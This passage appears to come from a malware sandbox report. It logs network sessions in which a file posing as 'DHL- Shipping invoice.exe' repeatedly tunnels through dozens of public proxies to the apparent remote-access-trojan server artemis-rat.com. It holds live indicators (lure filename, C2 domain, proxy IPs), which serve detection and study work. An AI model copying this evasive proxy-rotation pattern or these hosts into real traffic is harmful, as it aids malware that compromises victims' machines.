                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.578249931 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1466192.168.2.454293102.132.54.10780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.491067886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1467192.168.2.454175201.243.82.15731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.491116047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.576102972 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1468192.168.2.454359221.153.92.39806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.491378069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1469192.168.2.452825198.8.94.174390786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.496813059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1470192.168.2.45439646.232.248.164806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.496906996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1471192.168.2.45442782.113.157.122312806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.496906996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1472192.168.2.45430538.54.16.97806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.497447014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.837672949 CET176INHTTP/1.1 404 Not Found
                            Content-Type: text/plain; charset=utf-8
                            X-Content-Type-Options: nosniff
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Length: 19
                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                            Data Ascii: 404 page not found
                            Mar 12, 2024 08:37:06.737938881 CET176INHTTP/1.1 404 Not Found
                            Content-Type: text/plain; charset=utf-8
                            X-Content-Type-Options: nosniff
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Length: 19
                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                            Data Ascii: 404 page not found


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1473192.168.2.45442437.1.199.18806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.497612953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1474192.168.2.454504104.22.14.48806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.497695923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.585238934 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1475192.168.2.45425858.253.210.12288886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.524878979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1476192.168.2.454494184.185.105.10544816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.524879932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.006443977 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1477192.168.2.454463172.93.213.177806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.525031090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953197002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.359565020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.032969952 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.22.1
                            Date: Tue, 12 Mar 2024 07:37:13 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1478192.168.2.45435527.96.235.171806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.525423050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1479192.168.2.454411161.97.74.176300006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.525423050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.706069946 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1480192.168.2.45376912.186.205.123806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.525804996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1481192.168.2.454425200.108.190.11098006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.526015997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1482192.168.2.45437620.210.113.3281236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.526247978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.791140079 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1483192.168.2.4543191.15.62.1256786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.526586056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1484192.168.2.454270114.79.148.218806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.527298927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.361543894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.640991926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.047036886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.750122070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.453452110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.215192080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.643050909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.156040907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1485192.168.2.454524185.162.228.154806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.529355049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.617058992 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1486192.168.2.45445866.78.54.93200006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.529757977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.688407898 CET1286INHTTP/1.1 407 Proxy Authentication Required
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3656
                            X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                            Vary: Accept-Language
                            Content-Language: en
                            Proxy-Authenticate: Basic realm="Private"
                            X-Cache: MISS from localhost
                            Connection: keep-alive
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 43 61 63 68 65 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65
